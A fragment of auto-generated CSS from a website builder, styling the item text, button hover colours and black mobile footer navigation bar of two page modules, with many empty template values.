#module_383569204 .itemtext{font-weight:normal;}
#module_383569204 .itemtext{text-decoration:none;}
#module_383569204 .itemtext{font-style:normal;}
#module_383569204 .defaultbtnbghover{background-color:#f10215}
#module_383569204 .defaultbtnbghover{}
#module_383569204 .defaultbtniconbghover{color:#fff}
.module_383569205 .ModuleHead .HeadCenter{float:none;}
#module_383569205 {
padding:0px;
}
#module_383569205 {
}
#module_383569205 .ModuleHead0 {
display:none;
}
#module_383569205 .ModuleHead .HeadText.HeadText0 {
}
#module_383569205 .ModuleHead .HeadTextMore.HeadTextMore0 {
}
#module_383569205 >.module_0 {
border:none;
}
@media screen and (min-width: 768px){
#module_383569205 .BodyCenter.BodyCenter0 {
}
}
@media screen and (max-width: 767px){
#module_383569205 .BodyCenter.BodyCenter0 {
}
}
#module_383569205 .BodyCenter.BodyCenter0 {
}
#module_383569205 .BodyCenter a {
}

#module_383569205 .foot-nav-list{background-color:rgb(0, 0, 0) !important;}
#module_383569205 .foot-nav-list{border-top-color:;}
#module_383569205 .foot-nav-list{border-top-style:;}
#module_383569205 .foot-nav-list{border-top-width:px;}
#module_383569205 #MobileFootNav{box-shadow:;}
#module_383569205 .icon{color: !important;} #module_383569205 .icon svg >*{fill:}
#module_383569205 .itemText{font-size:px;}
#module_383569205 .itemText{font-family:;}
#module_383569205 .itemText{color:#fff !important;}
#module_383569205 .itemText{}
#module_383569205 .itemText{}
#module_383569205 .itemText{}
#module_383569205 .iconh{color: !important;}  #module_383569205 .iconh svg >*{fill:}
#module_383569205 .itemTexth{font-size:px;}
#module_383569205 .itemTexth{font-family:;}
#module_383569205 .itemTexth{color:#fff !important;}
#module_383569205 .itemTexth{}
#module_383569205 .itemTexth{}
#module_383569205 .itemTexth{}
